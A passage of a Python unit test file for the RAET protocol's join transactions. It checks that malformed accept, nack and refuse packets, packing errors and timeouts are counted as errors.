joinent = transacting.Joinent(stack=alpha,
remote=remote,
timeout=timeout,
sid=packet.data['si'],
tid=packet.data['ti'],
txData=data,
rxPacket=packet)
# Skip actual join, it's not needed for test
# ack accept
if alpha.kind is None:
alpha.kind = 0
# Hack: set mode to none
body = odict([ ('name', alpha.local.name),
('mode', None),
('kind', alpha.kind),
('uid', remote.uid),
('verhex', str(alpha.local.signer.verhex.decode('ISO-8859-1'))),
('pubhex', str(alpha.local.priver.pubhex.decode('ISO-8859-1'))),
('role', alpha.local.role)])
packet = packeting.TxPacket(stack=alpha,
kind=raeting.PcktKind.response.value,
embody=body,
data=joinent.txData)
packet.pack()
console.concise("Joinent {0}. Do Accept of {1} at {2}\n".format(
alpha.name, alpha.name, alpha.store.stamp))
joinent.transmit(packet)
self.serviceStacks([alpha], duration=0.1)
self.serviceStacks([beta], duration=0.1)
self.assertIn('invalid_accept', beta.stats)
self.assertEqual(beta.stats['invalid_accept'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerAcceptMissingKind(self):
'''
Test joiner.accept packet has no kind (coverage)
'''
console.terse("{0}\n".format(self.testJoinerAcceptMissingKind.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
# Test:
console.terse("\nTest joiner accept missing kind *********\n")
beta.join()
self.serviceStacks([beta], duration=0.1)
# service alpha, reply
alpha.serviceReceives()
raw, sa = alpha.rxes.popleft()
console.verbose("{0} received packet\n{1}\n".format(alpha.name, raw))
packet = packeting.RxPacket(stack=self, packed=raw)
packet.parseOuter()
sh, sp = sa
packet.data.update(sh=sh, sp=sp)
# process rx
remote = alpha.remotes.get(packet.data['de'], None)
# reply join
timeout = alpha.JoinentTimeout
data = odict(hk=alpha.Hk, bk=alpha.Bk)
joinent = transacting.Joinent(stack=alpha,
remote=remote,
timeout=timeout,
sid=packet.data['si'],
tid=packet.data['ti'],
txData=data,
rxPacket=packet)
# Hack: set stack name to None
flags = [0, 0, 0, 0, 0, 0, 0, alpha.main] # stack operation mode flags
operation = packByte(fmt=b'11111111', fields=flags)
# Skip actual join, it's not needed for test
# Hack: set mode to none
body = odict([ ('name', alpha.local.name),
('mode', operation),
('kind', None),
('uid', remote.uid),
('verhex', str(alpha.local.signer.verhex.decode('ISO-8859-1'))),
('pubhex', str(alpha.local.priver.pubhex.decode('ISO-8859-1'))),
('role', alpha.local.role)])
packet = packeting.TxPacket(stack=alpha,
kind=raeting.PcktKind.response.value,
embody=body,
data=joinent.txData)
packet.pack()
console.concise("Joinent {0}. Do Accept of {1} at {2}\n".format(
alpha.name, alpha.name, alpha.store.stamp))
joinent.transmit(packet)
self.serviceStacks([alpha], duration=0.1)
self.serviceStacks([beta], duration=0.1)
self.assertIn('invalid_accept', beta.stats)
self.assertEqual(beta.stats['invalid_accept'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerAcceptMissingUid(self):
'''
Test joiner.accept packet has no uid (coverage)
'''
console.terse("{0}\n".format(self.testJoinerAcceptMissingUid.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
# Test:
console.terse("\nTest joiner accept missing uid *********\n")
beta.join()
self.serviceStacks([beta], duration=0.1)
# service alpha, reply
alpha.serviceReceives()
raw, sa = alpha.rxes.popleft()
console.verbose("{0} received packet\n{1}\n".format(alpha.name, raw))
packet = packeting.RxPacket(stack=self, packed=raw)
packet.parseOuter()
sh, sp = sa
packet.data.update(sh=sh, sp=sp)
# process rx
remote = alpha.remotes.get(packet.data['de'], None)
# reply join
timeout = alpha.JoinentTimeout
data = odict(hk=alpha.Hk, bk=alpha.Bk)
joinent = transacting.Joinent(stack=alpha,
remote=remote,
timeout=timeout,
sid=packet.data['si'],
tid=packet.data['ti'],
txData=data,
rxPacket=packet)
# Skip actual join, it's not needed for test
flags = [0, 0, 0, 0, 0, 0, 0, alpha.main] # stack operation mode flags
operation = packByte(fmt=b'11111111', fields=flags)
# Skip actual join, it's not needed for test
# Hack: set remote uid to None
body = odict([ ('name', alpha.local.name),
('mode', operation),
('kind', alpha.kind),
('uid', None),
('verhex', str(alpha.local.signer.verhex.decode('ISO-8859-1'))),
('pubhex', str(alpha.local.priver.pubhex.decode('ISO-8859-1'))),
('role', alpha.local.role)])
packet = packeting.TxPacket(stack=alpha,
kind=raeting.PcktKind.response.value,
embody=body,
data=joinent.txData)
packet.pack()
console.concise("Joinent {0}. Do Accept of {1} at {2}\n".format(
alpha.name, alpha.name, alpha.store.stamp))
joinent.transmit(packet)
self.serviceStacks([alpha], duration=0.1)
self.serviceStacks([beta], duration=0.1)
self.assertIn('invalid_accept', beta.stats)
self.assertEqual(beta.stats['invalid_accept'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerAcceptMissingVerhex(self):
'''
Test joiner.accept packet has no verhex (coverage)
'''
console.terse("{0}\n".format(self.testJoinerAcceptMissingVerhex.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
# Test:
console.terse("\nTest joiner accept missing verhex *********\n")
beta.join()
self.serviceStacks([beta], duration=0.1)
# service alpha, reply
alpha.serviceReceives()
raw, sa = alpha.rxes.popleft()
console.verbose("{0} received packet\n{1}\n".format(alpha.name, raw))
packet = packeting.RxPacket(stack=self, packed=raw)
packet.parseOuter()
sh, sp = sa
packet.data.update(sh=sh, sp=sp)
# process rx
remote = alpha.remotes.get(packet.data['de'], None)
# reply join
timeout = alpha.JoinentTimeout
data = odict(hk=alpha.Hk, bk=alpha.Bk)
joinent = transacting.Joinent(stack=alpha,
remote=remote,
timeout=timeout,
sid=packet.data['si'],
tid=packet.data['ti'],
txData=data,
rxPacket=packet)
# Hack: set stack name to None
alpha.local.signer.verhex = None
# Skip actual join, it's not needed for test
joinent.ackAccept()
self.serviceStacks([alpha], duration=0.1)
self.serviceStacks([beta], duration=0.1)
self.assertIn('invalid_accept', beta.stats)
self.assertEqual(beta.stats['invalid_accept'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerAcceptMissingPubhex(self):
'''
Test joiner.accept packet has no pubhex (coverage)
'''
console.terse("{0}\n".format(self.testJoinerAcceptMissingPubhex.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
# Test:
console.terse("\nTest joiner accept missing pubhex *********\n")
beta.join()
self.serviceStacks([beta], duration=0.1)
# service alpha, reply
alpha.serviceReceives()
raw, sa = alpha.rxes.popleft()
console.verbose("{0} received packet\n{1}\n".format(alpha.name, raw))
packet = packeting.RxPacket(stack=self, packed=raw)
packet.parseOuter()
sh, sp = sa
packet.data.update(sh=sh, sp=sp)
# process rx
remote = alpha.remotes.get(packet.data['de'], None)
# reply join
timeout = alpha.JoinentTimeout
data = odict(hk=alpha.Hk, bk=alpha.Bk)
joinent = transacting.Joinent(stack=alpha,
remote=remote,
timeout=timeout,
sid=packet.data['si'],
tid=packet.data['ti'],
txData=data,
rxPacket=packet)
# Hack: set stack name to None
alpha.local.priver.pubhex = None
# Skip actual join, it's not needed for test
joinent.ackAccept()
self.serviceStacks([alpha], duration=0.1)
self.serviceStacks([beta], duration=0.1)
self.assertIn('invalid_accept', beta.stats)
self.assertEqual(beta.stats['invalid_accept'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerAcceptMissingRole(self):
'''
Test joiner.accept packet has no role (coverage)
'''
console.terse("{0}\n".format(self.testJoinerAcceptMissingRole.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
# Test:
console.terse("\nTest joiner accept missing role *********\n")
beta.join()
self.serviceStacks([beta], duration=0.1)
# service alpha, reply
alpha.serviceReceives()
raw, sa = alpha.rxes.popleft()
console.verbose("{0} received packet\n{1}\n".format(alpha.name, raw))
packet = packeting.RxPacket(stack=self, packed=raw)
packet.parseOuter()
sh, sp = sa
packet.data.update(sh=sh, sp=sp)
# process rx
remote = alpha.remotes.get(packet.data['de'], None)
# reply join
timeout = alpha.JoinentTimeout
data = odict(hk=alpha.Hk, bk=alpha.Bk)
joinent = transacting.Joinent(stack=alpha,
remote=remote,
timeout=timeout,
sid=packet.data['si'],
tid=packet.data['ti'],
txData=data,
rxPacket=packet)
# Hack: set stack name to None
alpha.local.role = None
# Skip actual join, it's not needed for test
joinent.ackAccept()
self.serviceStacks([alpha], duration=0.1)
self.serviceStacks([beta], duration=0.1)
self.assertIn('invalid_accept', beta.stats)
self.assertEqual(beta.stats['invalid_accept'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testVacuousJoinerAcceptConflictNames(self):
'''
Test joiner.accept with name conflict (coverage)
'''
console.terse("{0}\n".format(self.testVacuousJoinerAcceptConflictNames.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
alphaRemoteBeta = alpha.remotes.values()[0]
betaRemoteAlpha = beta.remotes.values()[0]
gammaData = self.createRoadData(base=self.base,
name='gamma',
ha=("", raeting.RAET_TEST_PORT+1),
main=True,
auto=raeting.AutoMode.once.value)
keeping.clearAllKeep(gammaData['dirpath'])
gamma = self.createRoadStack(data=gammaData)
console.terse("\nJoin Transaction **************\n")
betaRemoteGamma = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=gamma.local.ha))
beta.join(uid=betaRemoteGamma.uid)
self.serviceStacks([beta, gamma])
# Test:
console.terse("\nTest joiner accept name conflict *********\n")
beta.mutable = True
alpha.local.name = 'gamma'
# Vacuous
betaRemoteAlpha.fuid = 0
self.join(beta, alpha)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testVacuousJoinerAcceptRenameFail(self):
'''
Test joiner.accept fail rename remote (coverage)
'''
console.terse("{0}\n".format(self.testVacuousJoinerAcceptRenameFail.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
# Test:
beta.clearStats()
console.terse("\nTest joiner accept rename fail *********\n")
beta.mutable = True
# Rename alpha to beta so:
# - this would produce name conflict on rename
# - this wouldn't be covered by pre-checks before call renameRemote
alpha.local.name = 'beta'
# Vacuous
beta.remotes.values()[0].fuid = 0
self.join(beta, alpha)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerPendErrorParseInner(self):
'''
Test joiner.pend got error on parsing packet inner (coverage)
'''
console.terse("{0}\n".format(self.testJoinerPendErrorParseInner.__doc__))
alpha, beta = self.bootstrapJoinedRemotes()
alpha.keep.auto = raeting.AutoMode.never.value
alpha.mutable = True
alphaRemoteBeta = alpha.remotes.values()[0]
alpha.keep.pendRemote(alphaRemoteBeta)
# Ensure remote status is Pending
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
# Test
beta.join()
self.serviceStacks([beta], duration=0.1) # send join
# service alpha
alpha.serviceReceives()
raw, sa = alpha.rxes.popleft()
console.verbose("{0} received packet\n{1}\n".format(alpha.name, raw))
packet = packeting.RxPacket(stack=self, packed=raw)
packet.parseOuter()
sh, sp = sa
packet.data.update(sh=sh, sp=sp)
# process rx
remote = alpha.remotes.get(packet.data['de'], None)
# reply join
timeout = alpha.JoinentTimeout
data = odict(hk=alpha.Hk, bk=alpha.Bk)
joinent = transacting.Joinent(stack=alpha,
remote=remote,
timeout=timeout,
sid=packet.data['si'],
tid=packet.data['ti'],
txData=data,
rxPacket=packet)
# Hack: break packet inner
data['ck'] = -1
# Skip actual join, it's not needed for test
joinent.ackPend()
self.serviceStacks([alpha], duration=0.1) # handle and respond
self.serviceStacks([beta], duration=0.1) # receive response
# Checks
self.assertIn('parsing_inner_error', beta.stats)
self.assertEqual(beta.stats['parsing_inner_error'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
    def testJoinerNackErrorPack(self):
        '''
        Test joiner.nack packet.pack error (coverage)
        '''
        console.terse("{0}\n".format(self.testJoinerNackErrorPack.__doc__))
        alpha, beta = self.bootstrapJoinedRemotes()
        beta.keep.auto = raeting.AutoMode.never.value
        beta.mutable = True
        betaRemoteAlpha = beta.remotes.values()[0]
        beta.keep.rejectRemote(betaRemoteAlpha) # force nack the next join request
        # Ensure remote status is Rejected
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertIs(roleData['acceptance'], raeting.Acceptance.rejected.value)
        # Test
        beta.join()
        self.serviceStacks([beta], duration=0.1) # send join
        self.serviceStacks([alpha], duration=0.1) # handle and respond
        # shrink the max packet size so the nack's packet.pack() fails
        default_size = raeting.UDP_MAX_PACKET_SIZE
        raeting.UDP_MAX_PACKET_SIZE = 10 # packet.pack() will throw PacketError
        self.serviceStacks([beta], duration=0.1) # receive response, try to nack
        raeting.UDP_MAX_PACKET_SIZE = default_size
        # Checks: the pack failure must be counted as a packing error on beta
        self.assertIn('packing_error', beta.stats)
        self.assertEqual(beta.stats['packing_error'], 1)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
def testJoinerNackIncorrectPacketKind(self):
'''
Test joiner.nack packet not expected packet type (coverage)
'''
console.terse("{0}\n".format(self.testJoinerNackIncorrectPacketKind.__doc__))
alpha, beta = self.bootstrapJoinedRemotes()
beta.clearStats()
beta.join()
beta.transactions[0].nack(kind=raeting.PcktKind.unknown.value)
# Checks
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
    def testJoinerAckPendErrorPack(self):
        '''
        Test joiner.ackPend packet.pack error (coverage)
        '''
        console.terse("{0}\n".format(self.testJoinerAckPendErrorPack.__doc__))
        alpha, beta = self.bootstrapJoinedRemotes()
        beta.keep.auto = raeting.AutoMode.never.value
        beta.mutable = True
        betaRemoteAlpha = beta.remotes.values()[0]
        beta.keep.pendRemote(betaRemoteAlpha)
        # Ensure remote status is Pending
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
        # Test
        beta.join()
        self.serviceStacks([beta], duration=0.1) # send join
        self.serviceStacks([alpha], duration=0.1) # handle and respond
        # shrink the max packet size so ackPend's packet.pack() fails
        default_size = raeting.UDP_MAX_PACKET_SIZE
        raeting.UDP_MAX_PACKET_SIZE = 10 # packet.pack() will throw PacketError
        self.serviceStacks([beta], duration=0.1) # receive response, pend
        raeting.UDP_MAX_PACKET_SIZE = default_size
        # Checks: the pack failure must be counted as a packing error on beta
        self.assertIn('packing_error', beta.stats)
        self.assertEqual(beta.stats['packing_error'], 1)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
def testJoinerAckAcceptErrorPack(self):
'''
Test joiner.ackAccept packet.pack error (coverage)
'''
console.terse("{0}\n".format(self.testJoinerAckAcceptErrorPack.__doc__))
alpha, beta = self.bootstrapJoinedRemotes()
# Test
beta.join()
self.serviceStacks([beta], duration=0.1) # send join
self.serviceStacks([alpha], duration=0.1) # handle and respond
default_size = raeting.UDP_MAX_PACKET_SIZE
raeting.UDP_MAX_PACKET_SIZE = 10 # packet.pack() will throw PacketError
self.serviceStacks([beta], duration=0.1) # receive response, pend
raeting.UDP_MAX_PACKET_SIZE = default_size
# Checks
self.assertIn('packing_error', beta.stats)
self.assertEqual(beta.stats['packing_error'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerAckAcceptCascade(self):
'''
Test joiner.ackAccept cascade (coverage)
'''
console.terse("{0}\n".format(self.testJoinerAckAcceptCascade.__doc__))
alpha, beta = self.bootstrapJoinedRemotes()
# Test
beta.join(cascade=True)
self.serviceStacks([alpha, beta])
# Checks
for stack in [alpha, beta]:
remote = stack.remotes.values()[0]
self.assertTrue(remote.joined, True)
self.assertTrue(remote.allowed, True)
self.assertTrue(remote.alived, True)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
    def testJoinerRefuseErrorParseInner(self):
        '''
        Test joiner.refuse error parse inner (coverage)
        '''
        console.terse("{0}\n".format(self.testJoinerRefuseErrorParseInner.__doc__))
        alpha, beta = self.bootstrapJoinedRemotes()
        alpha.keep.auto = raeting.AutoMode.never.value
        alpha.keep.pendRemote(alpha.remotes.values()[0])
        # Test
        beta.join(cascade=True)
        self.serviceStacks([beta], duration=0.1) # process, send join
        self.serviceStacks([alpha], duration=0.1) # process join, add pend transaction
        # Do malformed nack from alpha
        alpha.transactions[0].txData['ck'] = -1 # invalid coat kind breaks the packet inner
        self.store.advanceStamp(stacking.RoadStack.JoinerTimeout) # set timeout expired
        self.serviceStacks([alpha], duration=0.1) # handle timeout, send nack
        self.store.advanceStamp(0.05)
        time.sleep(0.05)
        self.serviceStacks([beta], duration=0.1) # receive and handle
        # Checks: beta must count the unparsable refuse inner as a parse error
        self.assertIn('parsing_inner_error', beta.stats)
        self.assertEqual(beta.stats['parsing_inner_error'], 1)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinerRejectErrorParseInner(self):
        '''
        Test joiner.reject error parse inner (coverage)
        '''
        console.terse("{0}\n".format(self.testJoinerRejectErrorParseInner.__doc__))
        alpha, beta = self.bootstrapJoinedRemotes()
        alpha.keep.auto = raeting.AutoMode.never.value
        alpha.keep.pendRemote(alpha.remotes.values()[0])
        # Test
        beta.join(cascade=True)
        self.serviceStacks([beta], duration=0.1) # process, send join
        self.serviceStacks([alpha], duration=0.1) # process join, add pend transaction
        # Do malformed nack from alpha
        alpha.transactions[0].txData['ck'] = -1 # invalid coat kind breaks the packet inner
        alpha.transactions[0].nack(kind=raeting.PcktKind.reject.value)
        self.serviceStacks([alpha], duration=0.1) # send the malformed reject nack
        self.serviceStacks([beta], duration=0.1) # receive and handle
        # Checks: beta must count the unparsable reject inner as a parse error
        self.assertIn('parsing_inner_error', beta.stats)
        self.assertEqual(beta.stats['parsing_inner_error'], 1)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinerClearJoinentNotClear(self):
        '''
        Test joiner join after Joiner loses its remotes but Joinent did not. (coverage)
        This is a coverage test to verify common use case
        '''
        console.terse("{0}\n".format(self.testJoinerClearJoinentNotClear.__doc__))
        alpha, alphaData = self.bootstrapStack(name='alpha',
                                               ha=("", raeting.RAET_PORT),
                                               main=True,
                                               auto=raeting.AutoMode.once.value,
                                               role=None,
                                               kind=None,
                                               mutable=False, )
        self.assertIs(alpha.local.role, 'alpha')
        self.assertEqual(alpha.ha, ('0.0.0.0', raeting.RAET_PORT))
        self.assertEqual(alpha.local.ha, ('127.0.0.1', raeting.RAET_PORT))
        beta, betaData = self.bootstrapStack(name='beta',
                                             ha=("", raeting.RAET_TEST_PORT),
                                             main=None,
                                             auto=raeting.AutoMode.once.value,
                                             role=None,
                                             kind=None,
                                             mutable=False, )
        self.assertIs(beta.local.role, 'beta')
        self.assertEqual(beta.ha, ('0.0.0.0', raeting.RAET_TEST_PORT))
        self.assertEqual(beta.local.ha, ('127.0.0.1', raeting.RAET_TEST_PORT))
        # Do initial vacuous join to set up the loss scenario
        # create remote to join to alpha
        remote = beta.addRemote(estating.RemoteEstate(stack=beta,
                                                      fuid=0, # vacuous join
                                                      sid=0, # always 0 for join
                                                      ha=alpha.local.ha))
        self.join(beta, alpha, deid=remote.uid)
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 0)
            self.assertEqual(len(stack.remotes), 1)
            for remote in stack.remotes.values():
                self.assertIs(remote.joined, True)
                self.assertIs(remote.acceptance, raeting.Acceptance.accepted.value)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
        alphaRemoteBeta = alpha.remotes.values()[0]
        betaRemoteAlpha = beta.remotes.values()[0]
        # save the current state of beta stack remote for alpha
        betaRemoteAlphaSave = self.copyData(betaRemoteAlpha)
        self.assertEqual(beta.puid, 2)
        data = beta.keep.loadLocalData()
        # now lose all beta remotes and reboot beta stack
        # NOTE(review): assumes remotes.values() yields a copy so removal while
        # iterating is safe (true for py2 dict/odict) — confirm if ported to py3
        for remote in beta.remotes.values():
            beta.removeRemote(remote, clear=True)
        # Close down beta stack
        beta.server.close()
        # reboot beta stack from its saved bootstrap data
        beta = self.createRoadStack(data=betaData)
        self.assertIs(beta.main, betaData['main'])
        self.assertIs(beta.keep.auto, betaData['auto'])
        self.assertIs(beta.kind, betaData['kind'])
        self.assertIs(beta.mutable, betaData['mutable'])
        self.assertEqual(beta.local.role, 'beta')
        self.assertEqual(beta.ha, ('0.0.0.0', raeting.RAET_TEST_PORT))
        self.assertEqual(beta.local.ha, ('127.0.0.1', raeting.RAET_TEST_PORT))
        self.assertEqual(len(beta.remotes), 0)
        self.assertEqual(beta.keep.dirpath, betaData['dirpath'])
        # role/keys data for alpha survives the reboot even though the remote is gone
        data = beta.keep.loadRemoteRoleData(role= alpha.local.role)
        self.assertEqual(data['role'], alpha.local.role)
        self.assertEqual(data['acceptance'], raeting.Acceptance.accepted.value)
        self.assertEqual(ns2b(data['verhex']), alpha.local.signer.verhex)
        self.assertEqual(ns2b(data['pubhex']), alpha.local.priver.pubhex)
        self.assertEqual(beta.keep.auto, raeting.AutoMode.once.value)
        self.assertEqual(beta.puid, 2)
        # create remote to join to alpha
        newBetaRemoteAlpha = beta.addRemote(estating.RemoteEstate(stack=beta,
                                                                  fuid=0, # vacuous join
                                                                  sid=0, # always 0 for join
                                                                  ha=alpha.local.ha))
        # will reject since nuid changed for newBetaRemoteAlpha
        self.assertNotEqual(newBetaRemoteAlpha.nuid, betaRemoteAlpha.nuid)
        self.assertIs(beta.mutable, False)
        self.assertIs(alpha.mutable, False)
        self.join(beta, alpha, deid=newBetaRemoteAlpha.uid)
        self.assertEqual(len(alpha.transactions), 0)
        self.assertEqual(len(alpha.remotes), 1)
        remote = alpha.remotes.values()[0]
        self.assertTrue(remote.joined)
        self.assertIs(remote.allowed, None)
        self.assertIs(remote.alived, None)
        self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
        self.assertEqual(len(beta.transactions), 0)
        self.assertEqual(len(beta.remotes), 0)
        self.assertIn('joiner_rx_reject', beta.stats)
        self.assertEqual(beta.stats['joiner_rx_reject'], 1)
        self.assertIn('joiner_transaction_failure', beta.stats)
        self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
        self.assertEqual(beta.puid, 3)
        # redo after resetting beta.puid to 1 so the new remote reuses the old nuid
        beta.puid = 1
        self.assertEqual(beta.puid, 1)
        newBetaRemoteAlpha = beta.addRemote(estating.RemoteEstate(stack=beta,
                                                                  fuid=0, # vacuous join
                                                                  sid=0, # always 0 for join
                                                                  ha=alpha.local.ha))
        self.assertEqual(beta.puid, 2)
        self.assertIs(beta.mutable, False)
        self.assertIs(alpha.mutable, False)
        self.join(beta, alpha, deid=newBetaRemoteAlpha.uid)
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 0)
            self.assertEqual(len(stack.remotes), 1)
            for remote in stack.remotes.values():
                self.assertTrue(remote.joined)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
                self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
        self.assertTrue(self.sameAll(newBetaRemoteAlpha, betaRemoteAlphaSave))
        self.assertTrue(self.sameRoleKeys(newBetaRemoteAlpha, betaRemoteAlphaSave))
        self.assertEqual(newBetaRemoteAlpha.nuid, alphaRemoteBeta.fuid)
        self.assertEqual(newBetaRemoteAlpha.fuid, alphaRemoteBeta.nuid)
        self.assertIn('join_initiate_complete', beta.stats)
        self.assertEqual(beta.stats['join_initiate_complete'], 1)
        self.assertIn('join_correspond_complete', alpha.stats)
        self.assertEqual(alpha.stats['join_correspond_complete'], 2)
        # Check remote dump
        remoteData = beta.keep.loadRemoteData(alpha.local.name)
        remoteData['ha'] = tuple(remoteData['ha'])
        self.assertTrue(self.sameAll(newBetaRemoteAlpha, remoteData))
        self.assertIs(remoteData['fuid'], alphaRemoteBeta.uid) # value
        # Check role/keys dump
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
        self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
        self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
def testJoinerJoinInProcess(self):
'''
Test joiner.join do nothing if there is a join in process. (coverage)
'''
console.terse("{0}\n".format(self.testJoinerJoinInProcess.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
betaRemoteAlpha = beta.remotes.values()[0]
# Test 1: another joiner transaction in process
console.terse("\nTest joiner in process *********\n")
beta.join()
self.assertEqual(len(beta.transactions), 1) # 1 transaction is created
beta.join()
self.assertEqual(len(beta.transactions), 1) # nothing is created
self.serviceStacks([beta, alpha])
# Check join is done
self.assertEqual(len(beta.transactions), 0)
self.assertTrue(beta.remotes.values()[0].joined)
self.assertTrue(alpha.remotes.values()[0].joined)
# Test 2: another joinent transaction in process
console.terse("\nTest joinent in process *********\n")
alpha.join()
self.serviceStacks([alpha]) # send
self.serviceStacks([beta], duration=0.1) # receive
self.assertEqual(len(beta.transactions), 1) # 1 transaction is created
self.assertEqual(len(beta.txes), 0) # Ensure there is no tx packets
beta.join()
self.assertEqual(len(beta.transactions), 1) # no new transaction is created
self.assertEqual(len(beta.txes), 0) # Ensure no packet added
self.serviceStacks([beta, alpha])
# Check join is done
self.assertEqual(len(beta.transactions), 0)
self.assertTrue(beta.remotes.values()[0].joined)
self.assertTrue(alpha.remotes.values()[0].joined)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerJoinInvalidKind(self):
'''
Test joiner.join do nothing if stack kind is invalid (<0 or >255) (coverage)
'''
console.terse("{0}\n".format(self.testJoinerJoinInvalidKind.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
betaRemoteAlpha = beta.remotes.values()[0]
# Test:
console.terse("\nTest joiner join invalid kind *********\n")
beta.kind = -1
beta.join()
self.assertEqual(len(beta.transactions), 0) # no transaction is created
self.assertEqual(len(beta.txes), 0) # Ensure no packet was sent
beta.kind = 256
beta.join()
self.assertEqual(len(beta.transactions), 0) # nothing is created
self.assertEqual(len(beta.txes), 0) # Ensure no packet was sent
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerJoinPackError(self):
'''
Test joiner.join handles pack error (coverage)
'''
console.terse("{0}\n".format(self.testJoinerJoinPackError.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
betaRemoteAlpha = beta.remotes.values()[0]
# Test:
self.assertEqual(len(beta.txes), 0)
beta.clearStats()
console.terse("\nTest joiner join pack error *********\n")
default_size = raeting.UDP_MAX_PACKET_SIZE
raeting.UDP_MAX_PACKET_SIZE = 10 # packet.pack() will throw PacketError
beta.join() # will fail with packing error
raeting.UDP_MAX_PACKET_SIZE = default_size
self.assertEqual(len(beta.transactions), 0) # transaction is removed
self.assertIn('packing_error', beta.stats) # transaction failed
self.assertEqual(beta.stats['packing_error'], 1)
self.assertEqual(len(beta.txes), 0) # Ensure no packet was sent
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerProcessNoPacketTimeout(self):
'''
Test joiner.process timeout when no tx packets (coverage)
'''
console.terse("{0}\n".format(self.testJoinerProcessNoPacketTimeout.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
# Test:
console.terse("\nTest joiner process timeout when no tx packet *********\n")
beta.join() # create join transaction
self.assertEqual(len(beta.transactions), 1) # ensure there is only one transaction
beta.transactions[0].txPacket = None # make txPacket None
self.store.advanceStamp(stacking.RoadStack.JoinerTimeout) # set timeout expiresd
self.assertEqual(len(beta.transactions), 1)
self.serviceStacks([beta]) # Process
self.assertEqual(len(beta.transactions), 0)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
    def testJoinentJoinErrorParseInner(self):
        '''
        Test joinent.join handles parseInner error (coverage)
        '''
        console.terse("{0}\n".format(self.testJoinentJoinErrorParseInner.__doc__))
        # Status: Accepted (auto accept keys)
        # Mode: Never, Once, Always
        alpha, beta = self.bootstrapJoinedRemotes()
        # Test:
        beta.clearStats()
        console.terse("\nTest joinent join parseInner error *********\n")
        # join beta to alpha with broken packet inner
        remote = beta.retrieveRemote()
        self.assertIsNotNone(remote)
        timeout = beta.JoinerTimeout
        data = odict(hk=beta.Hk, bk=beta.Bk)
        joiner = transacting.Joiner(stack=beta,
                                    remote=remote,
                                    timeout=timeout,
                                    txData=data)
        data['ck'] = -1 # invalid coat kind so alpha cannot parse the inner
        joiner.join()
        self.serviceStacks([beta], duration=0.1)
